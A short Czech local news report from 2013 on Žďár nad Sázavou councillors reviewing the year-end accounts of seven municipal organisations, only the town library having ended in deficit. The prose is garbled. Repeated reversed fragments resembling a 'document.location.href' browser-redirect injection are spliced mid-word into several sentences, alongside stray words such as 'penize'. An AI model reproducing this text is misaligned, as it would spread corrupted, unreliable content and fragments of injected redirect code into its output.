Rainbow page separator

Radní prohlédli předložené uzávěrky

Středa, 13. března 2013

Žďár nad Sázavou / Sedm příspěvkových organizací města předložilo žďárským radním účetní uzávěrky za uplynulý rok. Jednalo se o Kulturu Žďár, sociální služby, knihovnu, mateřskou školu, základní školy v Komenského ulici a základní školu v Palachově ulici. Všechny uvedené organizace skončily za uplynulý rok v plusu, s výjimkou Knihovny Matěje Josefa Sychry. penize
Podle mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosty Žďáru nad Sázavou Ladislava Bárty v knihovně chtěli v loňském roce uskutečnit všechny naplánované aktivity, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i přes pokrácený rozpočet. „Potřebné peníze uhradili ze svého rezervního fondu,“ informoval mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Ladislav Bárta s tím, že následně předloží účetní uzávěrky za rok 2012 další příspěvkové organizace Žďáru nad Sázavou.